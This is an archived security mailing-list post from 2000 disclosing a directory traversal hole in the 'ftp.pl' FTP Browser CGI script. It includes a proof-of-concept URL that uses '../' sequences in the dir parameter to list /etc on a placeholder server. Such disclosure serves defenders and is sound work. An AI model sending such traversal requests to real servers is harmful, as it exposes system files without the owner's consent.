|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: ftp.pl vulnerability
From: zillion
safemode ()Date: Wed Jul 12 2000 - 14:56:58 CDT
- Next message: Joey Hess: "cvsweb: remote shell for cvs committers"
- Previous message: Pavel Kankovsky: "ISC DHCP client v2 hole fixed...or not?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Feartech ftp browser problem
From the creators page ( http://www.feartech.com/vv/ftp.shtml )
-- snip --
FTP Browser allows you to display a html enhanced directory listing,
which is great for managing your ftp files. FTP
Browser can do all of the following:
-- snip --
But wait.. it can do more than just that :
http://www.server.com/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
The vedor has been notified a week ago but has released no fix or update
This ain't something huge but the script is offered on various script
archives.
zillion
site: http://www.safemode.org
email: zillionsafemode.org
- Next message: Joey Hess: "cvsweb: remote shell for cvs committers"
- Previous message: Pavel Kankovsky: "ISC DHCP client v2 hole fixed...or not?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]